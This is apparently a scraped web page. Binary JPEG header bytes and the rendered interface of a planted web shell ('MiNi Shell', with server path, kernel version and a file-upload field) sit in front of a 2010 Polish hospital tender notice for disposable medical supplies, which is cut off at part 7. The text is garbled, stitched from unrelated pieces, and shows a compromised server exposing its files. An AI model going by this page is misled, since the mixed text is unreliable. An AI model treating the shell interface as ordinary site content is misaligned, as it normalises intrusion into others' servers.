JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/149517-N-2010.html

<p class="kh_header"><b>Krotoszyn: Dostawa sprzętu jednorazowego użytku: medycyna ogólna</b><br>
<b>Numer ogłoszenia: 149517 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku: medycyna ogólna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu jednorazowego użytku: medycyna ogólna, pakiety 1-13.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa sprzętu jednorazowego użytku: medycyna ogólna, maksymalnie 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 33.14.13.10-6, 33.14.13.20-9, 33.14.12.20-8, 33.14.16.24-0, 33.14.16.40-8, 33.14.16.24-0, 33.14.10.00-0, 33.14.16.00-6, 33.14.16.24-0, 33.14.17.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI SIWZ oraz : a)	Formularz ofertowy podpisany przez osobę upoważnioną do składania     oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1. b)	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl. c)	Projekt umowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 4. W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Jakość - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY: 1. Zamawiający w okresie trwania umowy zobowiązuje się zapłacić Wykonawcy za dostarczony przedmiot umowy cenę ustaloną w oparciu o Formularz Cenowy i wyliczone ceny jednostkowe w dniu zawarcia umowy, z zastrzeżeniem punktu 2. 2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się: zmianę stawek podatku VAT. 3. Zmiana stawek podatku VAT następuje z dniem ich wprowadzenia w życie stosownymi przepisami, za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. § 13 PROJEKTU UMOWY 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności. 2. Strony dopuszczają zmiany umowy w zakresie: - nazwy produktu przy zachowaniu jego parametrów - sposobu konfekcjonowania -	liczby opakowań - wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego/udoskonalonego - numeru katalogowego produktu. Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Krotoszyn, ul. Młyńska 2, 63-700 Krotoszyn, pokój nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Sekretariat SP ZOZ w Krotoszynie, ul. Młyńska 2, 63-700 Krotoszyn, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RĘKAWICZKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Rękawiczka diagnostyczna lateksowa lekko pudrowana o zawartości protein poniżej 80 ug/g, mankiet rolowany, uniwersalna pasująca na lewą i prawą dłoń,  poziom AOL-1,5 . Rozmiar  XS, S, M, L, XL. (1 op a 100 szt.) - 8 000 op.; 2 Rękawiczka diagnostyczna latexowa,  lekko pudrowana, o zawartosci protein poniżej 80ug/g, mankiet rolowany, uniwersalna pasująca  na lewą i prawą dłoń , poziomAOL-1,5  - Rozmiar  S , M, L. (1 op a 100 szt.) - 8 000 op.; 3 Rękawiczka diagnostyczna winilowa bezpudrowa, powierzchnia rękawiczki gładka, mankiet rolowany, uniwersalna pasująca na lewą i prawą dłoń, poziom AOL-1,5.Wytrzymałość na rozciąganie przed i po starzeniu min. 3,6N. Rozmiar  S,  M,  L. (1 op a 100 szt.) - 1500 op.; 4 Rękawiczka diagnostyczna sterylna lateksowa pudrowana,mankiet rolowany, o  zawartosci protein ponizej 100 ug/g , gładka na całej powierzchni dłoni, poziom AOL-1,5, uniwersalna pasująca na lewą i prawą dłoń, pakowane parami . Rozmiar  S,  M,  L. - 2 000 par; 5 Rękawiczka chirurgiczna sterylna lateksowa ortopedyczna, bezpudrowa,chlorowana i silikonowana, pokryta warstwą polimeru od wewnątrz, mikroteksturowana na całej powierzchni dłoni , mankiet rolowany, zawartość protein poniżej 30 ug/g, poziom AOL-1,5, grubość na środkowym palcu na pojedyńczej ściance min. 0,33 mm. - 1 500 par; 6 Rękawiczka chirurgiczna sterylna lateksowa, lekko pudrowana, mikroteksturowana na całej powierzchni dłoni, mankiet rolowany, zawartość protein poniżej 80 ug/g, poziom AOL- 1,0 grubość na środkowym palcu 0,21 - 0,23 mm. Mankiet rękawiczki w opakowaniu wywinięty,  rękawiczka niezłożona. Nie dopuszcza się rękawic bezpudrowych. - 25 000 par; 7 Rękawiczka chirurgiczna sterylna lateksowa, bezpudrowana, mikroteksturowana na całej powierzchni dłoni, mankiet rolowany, zawartość protein poniżej 50 ug/g, poziom AOL- 1,0 grubość na środkowym palcu 0,21 - 0,25 mm.Powierzchnia rękawiczki chlorowana i pokryta obustronnie polimerem. Mankiet rękawiczki wywinięty w opakowaniu,  rękawiczka niezłożona. Opakowanie zewnetrzne foliowane, zapewniające szczelność do momentu otwarcia - 2 000 par; 8 Rękawiczka diagnostyczna bezpudrowa, syntetyczna z nawilżającą wewnętrzną warstwą aloesową, kolor zielony, mankiet rolowany, AQL - 1,5, opak. Rozmiar S, M, L (1 op a 100 szt.) - 200 op.; 9 Rękawiczka diagnostyczna nitrylowa, kolor niebieski, AQL - 1,5, lekko teksturowana na całej powierzchni dłoni, (opak. 100 szt.) - 50 op; 10 Rękawiczka diagnostyczna lateksowa bezpudrowa, kolor ciemnoniebieski, mankiet rolowany,  poziom protein poniżej 30 ?g/g, długość rękawiczki min. 295 mm, grubość na środkowym palcu min 0,33 mm ( na pojedynczej ściance), AQL - 1,5, (opak. 50 szt.) - 50 op.; 11 Rękawiczka chirurgiczna syntetyczna wykonana z neoprenu, kolor zielony, z wewnętrzną warstwą polimerową, chlorowana i silikonowana, mankiet prosty, teksturowana na całej powierzchni dłoni, AQL-1,5 - 400 par; 12 Rękawiczki foliowe (op. a 100 szt.) - 85 op.
Zamawiający wymaga dostarczenia sprawozdania z badania produktów potwierdzajacego parametry oferowanych rękawic wystawione przez producenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> STRZYKAWKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Strzykawka j.u. 2 ml (op.100 szt.)- 700 op.; 2 Strzykawka j.u. 5 ml(op.100 szt.) - 750 op.; 3 Strzykawka j.u. 10 ml (op.100 szt.) - 1100 op.; 4 Strzykawka j.u. 20 ml (op.100 szt.) - 1 000 op.; 5 Strzykawka j.u. 50/60 ml Luer/Lock do pompy infuzyjnej z dwustronną skalą pomiarową (op.100 szt.)- 500 op.; 6 Strzykawka Janett 100 ml - szt. 3 500; 7 Strzykawka tuberkulinowa 1 ml z igłą (op.100 szt.) - 15 op.; 8 Strzykawka insulinówka 1 ml z igłą (op.100 szt.)- 5 op.; 9 Strzykawka 50/60 ml Luer/Lock do pompy bursztynowa lub czarna  z dwustronną skalą pomiarową szt. 400.

Zamawiający dopuszcza zaoferowanie następujących opakowań:
poz. 1 strzykawka 2 ml od 100 - 300 szt.
poz. 2 strzykawka 5 ml od 100 - 200 szt.
poz. 3 strzykawka 10 ml od 90 - 100 szt.
poz. 4 strzykawka 20 ml 0d 50 - 100 szt.
poz. 7 strzykawka tuberkulinowa 1 ml. z igłą od 100 - 200
poz. 8 strzykawka insulinówka 1 ml. z igłą od 100 - 200
z jednoczesnym przeliczeniem ceny do 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> IGŁY INIEKCYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Igła do iniekcji 0,45 - 0,9 mm ( dł wg zapotrzebowania bieżącego Zamawiającego) (op.100 szt.) - 1 400 op.; 2 Igła do iniekcji 1,1 mm x 40 mm (op.100 szt.) - 600 op.; 3 Igła do iniekcji 1,2 mm x 40 mm (op.100 szt.) -1 200 op.; 4 Igła do iniekcji 1,6 x 40 mm (op.100 szt.) -15 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IGŁY DO NAKŁUĆ JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 22 G x 3 1/2 (0,7 x 90 mm)-szt. 100; 2 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 18 G 1,2 x 90 mm-szt. 150; 3 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 20 G 0,9 x 90 mm-szt. 100; 4 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 27 G, długość 103 - 120 mm-szt. 100; 5 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 24 G x 103 mm z 38 mm prowadnicą-szt. 150; 6 Igła typu PENCIL POINT do wykonywania punkcji lędźwiowych i znieczuleń podpajęczynówkowych 24 G x 150 mm z 42 mm prowadnicą-szt. 50; 7 Igła typu PENCIL POINT z prowadnicą do znieczuleń podpajęczynówkowych 25G, długość  90 mm, z prowadnicą 20 G długość 30 - 38 mm-szt. 1 500..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> IGŁY MOTYLEK, VENFLONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Igła motylek 0,5 x 19mm ; 0,6 x 19 mm; 0,7 x 19 mm; 0,8 x 19 mm; 1,1 x 19 mm  zakończona drenem typ Luer - Lock-szt. 12000; 2 Igła jednorazowa do Peanów 0,25 x 8 mm lub 0,3 x 8 mm-szt. 800; 3 Korek Luer - Lok-szt. 15 000;  4 Kaniula tętnicza z zaworem odcinającym 20 G dł. 45 mm-szt. 100; 5 Kaniula dziecięca nr 0,6- 0,7 powinna posiadać zdejmowany uchwyt ułatwiający wprowadzanie do naczynia, dopuszcza się podanie kaniul w rozmiarach określonych w międzynarodowych jednostkach Gearge, przy równoczesnym zachowaniu standardowej kolorystyki i numeracji polskiej.Pakowane w sztywne opakowanie typu Tyvec zabezpieczające przed utrata jałowości- szt. 5 000; 6 Kaniula venflon- Kaniula ma posiadać 6 pasków radiacyjnych. Pakowane w sztywne opakowanie typu Tyvec zabezpieczajace przed utrata jałowości. Kaniule powinny posiadać rodzaj steryliacji, rozmiar, numer serii, natomiast na opakowaniu zbiorczym wartość przepływu, z jakiego materiału wykonana jest kaniula oraz długość kaniuli. Powierzchnia kaniuli powinna być idealnie gładka oraz musi być wykonna z poliuretanu i posiadać samozatrzaskowy port boczny. Rozmiary -  22G, 20G, 18G, 17G, 16G, 14 G- szt. 40 000; 7 Kaniula venflon- Kaniula ma posiadać  min. 4 paski radiacyjne , pakowane w opakowanie typu bezpiecznego, gdzie część papierowa poprzez swą wielowarstwową strukturę nie ulega rozerwaniu, a tym samym zabezpiecza przed niezamierzoną utratą jałowości w trakcie użytkowania, przechowywania i transportu. Kaniule powinny posiadać rodzaj steryliacji, rozmiar, numer serii, natomiast na opakowaniu zbiorczym wartość przepływu, z jakiego materiału wykonana jest kaniula oraz długość kaniuli. Powierzchnia kaniuli powinna być idealnie gładka i musi posiadać samozatrzaskowy port boczny, może być wykonana z poliuretanu. Rozmiary -24G- szt. 2 000; 8 Zamknięty system dostępu naczyniowego, bezigłowy do wielokrotnej aktywacji, bez mechanicznych części wewnętrznych w technologi podzielnej membrany silikonowej z końcówką LUER - szt. 200.
poz. 1 zamawiający dopuszcza zaoferowanie igły motylek o długości 20 mm						 			 
poz. 4 zamawiający wymaga, aby kaniule wyposażone były w kulowo suwakowy zawór odcinający , eliminujący ryzyko powstania zatoru powietrznego oraz zapobiegający niebezpieczeństwu wynikającemu z ekspozycji personelu szpitalnego na kontakt z krwią.									
poz. 4 - 7 zamawiający nie wymaga, aby kaniule pochodziły od jednego producenta, natomiast  wymaga, aby w danej pozycji wszystkie kaniule pochodziły od jednego producenta									
Asortyment ze wszystkich pozycji pakowany pojedyńczo, sterylnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRZYRZĄDY DO PŁYNÓW I KRWI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Przyrząd do przetaczania płynów infuzyjnych - powinien posiadać długość komory kroplowej w granicach 4.0-6,0 cm i odpowietrzacz zamknięty/otwarty (ON/OFF)- szt. 75 000; 2 Przyrząd do przetaczania krwi- szt. 3 000;  3 Przyrząd do szybkiego przetaczania krwi i preparatów krwi-szt. 100; 4 Przyrząd do przetaczania płynów infuzyjnych z precyzyjnym regulatorem przepływu mieszczącym się w zakresie 2 - 350 ml/h, dren o dł. min. 1,5 m z portem do dodatkowej iniekcji-szt. 200; 5 Przyrząd do przetaczania płynów infuzyjnych z możliwością pomiaru odśrodkowego ciśnienia żylnego OCZ-szt. 150;  6 Przyrząd  do przetaczania płynów infuzyjnych bursztynowy lub czarny-szt. 100; 7 Przedłużacz do pompy infuzyjnej-szt. 8 000; 8 Przedłużacz do pompy infuzyjnej bursztynowy-szt. 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.24-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DRENY.</p>
